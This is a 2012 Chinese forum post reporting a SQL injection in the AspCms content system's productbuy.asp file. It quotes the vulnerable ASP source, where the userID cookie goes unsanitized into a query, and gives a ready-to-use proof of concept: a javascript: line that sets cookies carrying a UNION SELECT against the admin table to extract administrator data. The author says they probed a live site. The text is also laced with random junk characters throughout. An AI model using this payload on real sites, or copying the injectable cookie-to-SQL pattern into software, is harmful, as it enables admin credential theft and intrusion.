好久没上土司了,上来一看发现在删号名单内.....
4 K0 M9 J: k7 }. O, c也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。6 i5 }& V3 v. p( C
废话不多说,看代码:
; a0 k$ ^! H2 c/ d1 F m
4 e: I9 Q+ K* q* O R<%
+ b$ q& M: _( P5 r& n. U% S7 F5 S5 S0 w, e" s0 Q# G2 R
if action = "buy" then
; n! v5 L# @3 ^& X* Q0 ]$ C9 u( v, w' {: D6 P; E. P
addOrder()+ W5 n# |- d; |& L
4 ^/ x3 T# K9 uelse
# x3 r. v! y0 X4 n9 ]) W2 ^. [, q; x: o9 \# s/ c
echoContent() u1 i: y" Z2 T6 g3 ~" f! F
4 z4 v+ E3 y" tend if
# z: K. X7 v- u' m! K6 r8 Z2 N& f+ V/ A6 C
( @) r! ^ m6 `0 l$ y1 v; \. U8 V% J3 S# N5 i
……略过
3 E6 j7 Z! E5 s% S8 G7 _3 o) t e6 l4 s5 j
; h5 c5 G. ~# l/ T4 @1 C6 D
. P+ J3 e \5 L% {6 x# N8 i: O& VSub echoContent()' F% `, b% n$ D8 J# O2 L
. S! e! ~( w$ C7 D dim id
0 D( k7 F, K/ ^% q$ a
* c. ~) _0 F8 I id=getForm("id","get")
5 H5 h3 u% K; z' i" _
" L- S( J; R( h" w C) }* Q) D* e $ ~( R+ d- ^5 h" N }
9 b! q; I* v& J% p
if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1"
' r9 C/ r, ~$ ^1 |/ h0 i' ^) U" w; O/ _& g, D
$ O; u; D0 x3 M+ }4 ~
3 v: w2 q2 L! U, [3 u7 _9 _/ T dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")
# Q9 w- _8 r- r: O6 b4 G( H7 Z3 {' o0 ]
dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct0 T" c" v" r0 }" d, O8 U
9 G1 j1 d2 H# d
Dim templatePath,tempStr
8 s; F/ R" }, s Z1 V' Q) h
3 N( o, h, s& o templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"7 z8 u$ |) c* `9 D* [6 k
4 C" k& K( `% c( o
8 V6 Z" i! L; K0 M. [4 d ~' a0 x) o9 @3 V: b4 w) }/ e
set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")
$ s/ ]# D8 `: |3 n
/ G0 u L' U6 f/ [* J% m4 Q selectproduct=rsObj(0)
# |9 g9 J. p, M) P' @
+ N" |' Y$ D8 l5 n( `8 v7 X ; U3 ~, V, E- E' E/ T9 A& ~, a
3 p' l. i7 ?+ d# S/ n& Y
Dim linkman,gender,phone,mobile,email,qq,address,postcode! m! m8 ^- i% u" L: F
% C- Z+ o# V+ j3 }
if isnul(rCookie("loginstatus")) then wCookie"loginstatus",0
% F( @' C; b- U2 t$ g; U- l" g, t5 I
if rCookie("loginstatus")=1 then : l$ N/ g" W. r+ X' Q
+ V; j( H8 U, l% Q8 Y0 S& X
set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")
$ m: ^, u* V# D+ Q0 i5 v* u% F
4 S' n/ j1 j. {( d linkman=rsObj("truename")) \6 K1 ]5 {3 m/ C- j* r( R; ^
+ I- V9 p$ v: D! I gender=rsObj("gender")5 V9 I+ n& ]( F6 I w
9 m' c3 C! o/ \" n3 t phone=rsObj("phone")
- L* p' G4 ^, {) v1 `8 `4 o. n6 N0 j2 P4 `
mobile=rsObj("mobile")" s: D$ D2 L1 n5 H4 c
1 J* `' |* b1 ]& i) Q) l email=rsObj("email")$ z; A" ?- ? y7 u8 [. k
* c8 C' p# a! x* y& t" x qq=rsObj("qq")
% u, Q8 k- u( Z) i% [; x% y
3 }$ a, J4 t5 M0 m- ~ address=rsObj("address")0 g7 ?* X& u! V) Y8 ]% @' Q
x+ U0 u$ l2 U9 p
postcode=rsObj("postcode")
5 C" A# w6 ~$ U! p9 C$ t: J8 {; ^: \; o6 X
else
7 `8 }. U) D/ q' j u ]
; Z5 C) Q1 V' B. x gender=1
5 E3 p- U0 i% s j# H, v0 H/ B+ w+ j
end if
8 T8 s: N% @% x$ `$ L+ ?$ U& ]# m3 ^9 G" s- V
rsObj.close(), w- r2 H5 [2 W- x
% }: j8 d8 A. x
1 L# X2 J9 n; i0 M
9 _; K% V# b, }) H1 y& F) k with templateObj
) h8 G4 Q# Z" p0 f+ ~0 ~/ B* p% v0 z# F8 o, c
.content=loadFile(templatePath)
) M9 J J( T/ _# g
& ^! z0 ]; @/ P7 i( k .parseHtml()9 h! L; [5 ^6 N! _
! q9 N( ^0 h! }) r$ m% {& O
.content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)
' P; ^* X! i+ O. W' ?! K8 `0 k+ M& K$ r+ u* ]# ^3 m1 k1 j4 B% ?
.content=replaceStr(.content,"[aspcms:linkman]",linkman)
+ U9 v* o1 }. Q$ l9 W, Q! i
& K$ B% N& P7 w5 @ .content=replaceStr(.content,"[aspcms:gender]",gender) 4 A+ g, Y8 x e/ T* T# |! ~, R
9 P- {1 Z, W1 X2 @" Y' H P .content=replaceStr(.content,"[aspcms:phone]",phone) 7 R8 Z+ ]' m+ [, j* p
* b2 [; P! d8 X .content=replaceStr(.content,"[aspcms:mobile]",mobile)
: c/ W9 @' N8 o/ a9 }& H
9 b% m6 F2 n: X4 M- d6 @6 o3 E .content=replaceStr(.content,"[aspcms:email]",email)
$ o/ W/ |& n/ m5 V. h1 h
3 a9 a4 V8 v- K) G; [8 t .content=replaceStr(.content,"[aspcms:qq]",qq) 7 E6 m5 i9 L$ p3 J. W. r
% c& j; X! j# u$ H .content=replaceStr(.content,"[aspcms:address]",address)
; T8 {9 Q P5 [5 d1 ~% ]
Q7 C9 D# W6 z# } .content=replaceStr(.content,"[aspcms:postcode]",postcode)
" i3 t& v1 M5 B1 F& w6 X' h7 [' P$ P) {
.parseCommon() ) A9 x: O" |; D) P/ e: U
& L( w/ U& W- ]( V, p! _, O
echo .content 0 Y' b3 q$ D; t3 q' T0 |( n1 @% E1 b( B7 S( X
$ m& Z/ @9 j& L" [1 a end with
; D! {# i, M* y9 n7 i' f8 f# q6 R- C6 C& q$ _5 i
set templateobj =nothing : terminateAllObjects
8 H0 \# [9 r% [4 q! J L8 ?) w) v1 e" A
End Sub W0 V2 l( D ]" o# Q& D
漏洞很明显,没啥好说的! T8 N( i: n. s+ H& b/ F, v
poc:# Y: U5 B6 @/ T% B6 K
9 k) f1 Q) e4 I
javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子" x ]7 J; u: ]' G- a1 M
7 Z" x) c9 H* J/ v# M6 G |
发表于 2012-12-27 08:35:05
收藏
支持
反对